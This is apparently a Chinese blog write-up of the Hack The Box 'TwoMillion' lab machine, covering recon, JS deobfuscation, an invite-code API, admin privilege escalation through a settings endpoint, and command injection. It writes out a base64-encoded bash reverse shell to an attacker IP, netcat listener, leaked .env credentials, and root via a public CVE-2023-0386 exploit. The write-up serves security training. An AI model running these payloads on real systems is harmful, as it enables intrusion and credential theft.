HTB-TwoMillion 靶机笔记

TwoMillion 靶机笔记

概述

HTB 上的一台 liunx 靶机,难度定为了简单级别,它包括了对 js 接口的信息收集,js 反混淆,未授权,越权,命令注入等漏洞。

一、nmap 扫描

1)端口扫描

nmap -sT --min-rate 10000 -p- -o ports 10.10.11.221
Nmap scan report for 10.10.11.221
Host is up (0.37s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

2)详细信息

nmap -sT -sV -sC -p22,80 -O -o details 10.10.11.221
Nmap scan report for 10.10.11.221
Host is up (0.42s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://2million.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

看到 http-title: Did not follow redirect to http://2million.htb/,把 10.10.11.221 2million.htb 写到 /etc/hosts 里面

3)漏洞脚本

nmap --script=vuln -p22,80 -o vuln 10.10.11.221
Nmap scan report for 10.10.11.221
Host is up (1.1s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

看到目标机器开启了 20,80 端口

二、web 渗透

image-20241007183358723

打开后发现有两个接口可以访问 joinlogin

image-20241007183912115

注册需要邀请码,正常的网页邀请码,肯定是由网站用户访问对应的生成接口而生成的。那么我们可以找到对应的接口,看看能不能越权生成一个邀请码

F12 打开 js 代码,看到整个网站也就三个 js 文件

image-20241007184334509

inviteapi.min.js 这个名字也挺令我们感兴趣的。它的名字就是 “邀请的接口” ,但是它做了混淆,我们可以放到 js 反混淆的解析网站上,解析一下。

de4js:https://lelinhtinh.github.io/de4js/

image-20241007184709587

function verifyInviteCode(code) {
    var formData = {
        "code": code
    };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/how/to/generate',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

看到 verifyInviteCodemakeInviteCode 两个方法,他们都在方法里发送了 ajax 请求,我们可以用 curl 访问

curl -X POST http://2million.htb/api/v1/invite/generate
{"0":200,"success":1,"data":{"code":"MDgzSVMtVURIMEItVFpQM08tUVZNMVg=","format":"encoded"}}

对返回的结果作处理

curl -X POST http://2million.htb/api/v1/invite/generate | jq .data.code -r |base64 -d
4QXYT-HU98B-GKSER-OVB0B

使用邀请码注册用户,登陆

image-20241007185536322

image-20241007185608953

成功登陆

image-20241007185707543

把能点的按钮都点了点,这个 Access 还是值得我们关注的,请用 burp 抓包

image-20241007190107741

看到它的请求是 /api 开头的,我们可以访问 /api 看看有没有其他的接口暴露给我们

image-20241007190237360

根据返回信息,访问 /api/v1

image-20241007190332261

看到有 json 数据,burp 里不好看,我们用命令行工具处理一下

curl http://2million.htb/api/v1 -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" | jq . 
{
  "v1": {
    "user": {
      "GET": {
        "/api/v1": "Route List",
        "/api/v1/invite/how/to/generate": "Instructions on invite code generation",
        "/api/v1/invite/generate": "Generate invite code",
        "/api/v1/invite/verify": "Verify invite code",
        "/api/v1/user/auth": "Check if user is authenticated",
        "/api/v1/user/vpn/generate": "Generate a new VPN configuration",
        "/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
        "/api/v1/user/vpn/download": "Download OVPN file"
      },
      "POST": {
        "/api/v1/user/register": "Register a new user",
        "/api/v1/user/login": "Login with existing user"
      }
    },
    "admin": {
      "GET": {
        "/api/v1/admin/auth": "Check if user is admin"
      },
      "POST": {
        "/api/v1/admin/vpn/generate": "Generate VPN for specific user"
      },
      "PUT": {
        "/api/v1/admin/settings/update": "Update user settings"
      }
    }
  }
}

看到有 admin 用户才能访问的接口,而且有一个修改数据的接口 /admin/settings/update,尝试把我们的普通用户越权修改为 admin

image-20241007190926241

添加头部 content-type:application/json

image-20241007191032984

添加参数 email:lingx5@test.com

image-20241007191138363

添加 is_admin:1

image-20241007191238932

成功实现越权修改,我们现在已经是 admin 权限了

可以访问 admin 用户才能访问的 /admin/vpn/generate 接口

curl -X POST http://2million.htb/api/v1/admin/vpn/generate -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" -H 'content-type:application/json' -d '{"username":"lingx5"}'

根据提示一步步补齐参数,看到访问结果

尝试在 username 出命令注入

curl -X POST http://2million.htb/api/v1/admin/vpn/generate -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" -H 'content-type:application/json' -d '{"username":"lingx5;whoami;"}'
www-data

执行成功了

三、获得立足点

echo 'bash -c "bash -i >& /dev/tcp/10.10.14.41/4444 0>&1"'|base64
curl -X POST http://2million.htb/api/v1/admin/vpn/generate -b "PHPSESSID=8n4cd4rml2gut2a75j88pef57s" -H 'content-type:application/json' -d '{"username":"lingx5;echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40MS80NDQ0IDA+JjEiCg==|base64 -d | bash;"}'
sudo rlwrap nc -lvnp 4444

image-20241007192634247

ls -liah
total 56K
 67892 drwxr-xr-x 10 root root 4.0K Oct  7 11:20 .
 67891 drwxr-xr-x  3 root root 4.0K Jun  6  2023 ..
262194 -rw-r--r--  1 root root   87 Jun  2  2023 .env
 79498 -rw-r--r--  1 root root 1.3K Jun  2  2023 Database.php
 79502 -rw-r--r--  1 root root 2.8K Jun  2  2023 Router.php
 83002 drwxr-xr-x  5 root root 4.0K Oct  7 11:20 VPN
 79512 drwxr-xr-x  2 root root 4.0K Jun  6  2023 assets
 79508 drwxr-xr-x  2 root root 4.0K Jun  6  2023 controllers
 79492 drwxr-xr-x  5 root root 4.0K Jun  6  2023 css
 79506 drwxr-xr-x  2 root root 4.0K Jun  6  2023 fonts
 79494 drwxr-xr-x  2 root root 4.0K Jun  6  2023 images
262199 -rw-r--r--  1 root root 2.7K Jun  2  2023 index.php
 79496 drwxr-xr-x  3 root root 4.0K Jun  6  2023 js
 79510 drwxr-xr-x  2 root root 4.0K Jun  6  2023 views

看到 .env 文件

cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

看到了一组数据库的凭证 admin:SuperDuperPass123,尝试口令复用

www-data@2million:~/html$ su - admin
su - admin
Password: SuperDuperPass123

id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
whoami
admin

看到成功获得了 admin 的普通用户权限

四、提权到 root

查看属于 admin 用户的文件

find / -user admin -type f 2>/dev/null | grep -Ev "^/proc|^/run|^/sys"
/home/admin/.cache/motd.legal-displayed
/home/admin/.profile
/home/admin/.bash_logout
/home/admin/.bashrc
/var/mail/admin

看到有一封邮件

cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

提到了 OverlayFS,利用 google 快速了解一下

OverlayFS:https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/

覆盖文件系统(通常缩写为 OverlayFS)允许用户将多个挂载点 "合并 " 为一个统一的文件系统。

它出现过权限提升的漏洞

exploit:https://github.com/xkaneiki/CVE-2023-0386/

git clone https://github.com/xkaneiki/CVE-2023-0386.git

开启 http 服务,上传到目标机器上

wget -r http://10.10.14.41/CVE-2023-0386

image-20241007195616280

看到提示符已经变成了 root

总结

通过 nmap 扫描发现目标机器就开放了 22,80 端口,打开 80 端口的 web 服务,在 js 里找到了生成邀请码的接口,通过邀请码注册用户,登陆平台。通过访问/api/v1 找到了接口,进行越权。拿到 admin 权限,访问生成 vpn 的接口,发现了存在命令注入的参数,成功获得了 www-data 的立足点

在文件里看到 .env 文件,里面有一组数据库的凭证信息 admin: SuperDuperPass123 通过口令服用,我们成功拿到了 admin 用户的 shell。通过查看邮件,发现了 OverlayFS 这个可能的提权路径,通过 CVE-2023-0386 完成提权

posted @ 2024-10-07 20:34  Ling-X5  阅读(18)  评论(0编辑  收藏  举报